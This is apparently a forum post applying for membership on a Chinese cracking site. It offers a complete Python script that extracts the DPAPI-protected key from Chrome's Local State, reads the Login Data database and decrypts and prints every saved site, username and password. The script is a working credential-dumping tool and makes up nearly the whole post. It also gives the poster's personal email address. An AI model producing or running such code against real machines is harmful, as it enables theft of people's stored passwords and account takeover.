吾爱游客
发表于 2023-2-8 15:40
1、申 请 I D:drlee00
2、个人邮箱:864890381@qq.com
3、原创技术文章
python破解 chrome 自动填充密码,代码如下
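def get_key():
    """Return the AES key protecting Chrome's saved passwords, or None on failure.

    Reads the hard-coded ``Local State`` JSON file, base64-decodes
    ``os_crypt.encrypted_key``, checks for and strips the 5-byte ``DPAPI``
    marker, and passes the remainder to ``win32crypt.CryptUnprotectData``.

    NOTE(review): DPAPI normally binds a blob to the Windows account that
    protected it, so the unwrap is expected to succeed only in that user's
    context -- confirm for the environment this runs in.

    :return: the unwrapped key bytes, or None if any step fails (the
        exception text is printed).
    """
    path = 'D:/chrome_data/Local State'
    try:
        # Decode explicitly as UTF-8: with a bare open(path, "r") the result
        # depends on the locale code page and can fail on non-ASCII content.
        with open(path, "r", encoding="utf-8") as f:
            local_state = json.load(f)
        wrapped = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
        # Refuse to blindly chop five bytes off a blob that is not DPAPI-wrapped.
        if not wrapped.startswith(b"DPAPI"):
            raise ValueError("encrypted_key does not start with the DPAPI marker")
        # CryptUnprotectData returns a pair; index 1 is the decrypted data.
        key = win32crypt.CryptUnprotectData(wrapped[5:], None, None, None, 0)[1]
        # The key is deliberately not printed: it is secret material and
        # should not end up in console scrollback or captured logs.
        return key
    except Exception as e:
        print("Exception ", e)
        return None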
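def decrypt_password(buff, key):
    """Decrypt one Chrome ``password_value`` blob with AES-GCM.

    Blob layout for Chrome 80 and later, as described by the original notes::

        b'v10' (3 bytes) + nonce (12 bytes) + ciphertext + auth tag (16 bytes)

    ``AES.new(key, AES.MODE_GCM, iv)`` builds the cipher object; the nonce
    makes equal plaintexts encrypt to different ciphertexts. The trailing
    16 bytes are the GCM authentication tag (an integrity check over the
    ciphertext, not a per-user label).

    :param buff: raw ``password_value`` bytes read from the ``logins`` table.
    :param key: AES key of 16, 24 or 32 bytes.
    :return: the plaintext as ``str``; on any failure the literal string
        ``"Chrome < 80"``. That sentinel is returned for every error, not
        only for blobs in the older format.
    """
    try:
        # Prefix + nonce + tag is the minimum; anything shorter cannot be a
        # v10 blob, so fail before slicing produces empty pieces.
        if len(buff) < 3 + 12 + 16:
            raise ValueError("blob too short for v10 prefix, nonce and tag")
        iv = buff[3:15]
        ciphertext = buff[15:-16]
        auth_tag = buff[-16:]
        cipher = AES.new(key, AES.MODE_GCM, iv)
        # Verify the tag instead of discarding it: with a wrong key or a
        # corrupted blob, plain decrypt() would hand back garbage bytes.
        plaintext = cipher.decrypt_and_verify(ciphertext, auth_tag)
        # The plaintext is returned, not printed here; the caller decides
        # where (and whether) a recovered secret is shown.
        return plaintext.decode('utf-8')
    except Exception as e:
        print("Probably saved password from Chrome version older than v80\n")
        print(str(e))
        return "Chrome < 80"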
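def get_logins():
    """Print the saved logins found in the hard-coded ``Login Data`` database.

    Fetches the key with ``get_key()``, opens the SQLite file, selects
    ``origin_url``, ``username_value``, ``password_value`` and ``id`` from the
    ``logins`` table, and prints URL, user name and decrypted password for
    every row that has a non-empty password blob.

    The output contains plaintext credentials, so the console and any capture
    of it must be treated as sensitive. From a defender's point of view, what
    this routine does is read ``Local State`` and ``Login Data`` from a
    process that is not the browser.
    """
    # get_key() takes no arguments; the original call passed an undefined
    # name ``path`` and raised NameError before doing anything.
    key = get_key()
    if key is None:
        # get_key() has already printed the reason; without a key every
        # decryption would fail, so stop here.
        return
    login_db = 'D:/chrome_data/default/Login Data'
    conn = sqlite3.connect(login_db)
    try:
        cursor = conn.cursor()
        try:
            sql_text = "SELECT origin_url, username_value, password_value, id FROM logins"
            cursor.execute(sql_text)
            for origin_url, username_value, encrypted_password, _row_id in cursor.fetchall():
                # Rows without a stored password have nothing to decrypt.
                if not encrypted_password:
                    continue
                decrypted_password = decrypt_password(encrypted_password, key)
                print("origin_url: ", origin_url)
                print("username_value : ", username_value)
                print("decrypted_password: ", decrypted_password)
                print('=========================================')
        except Exception as e:
            print('Exception ', e)
        finally:
            cursor.close()
    finally:
        # Close the connection even if creating the cursor fails.
        conn.close()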
# Script entry point: list the saved logins only when this file is executed
# directly, not when it is imported as a module.
if __name__ == "__main__":
    get_logins()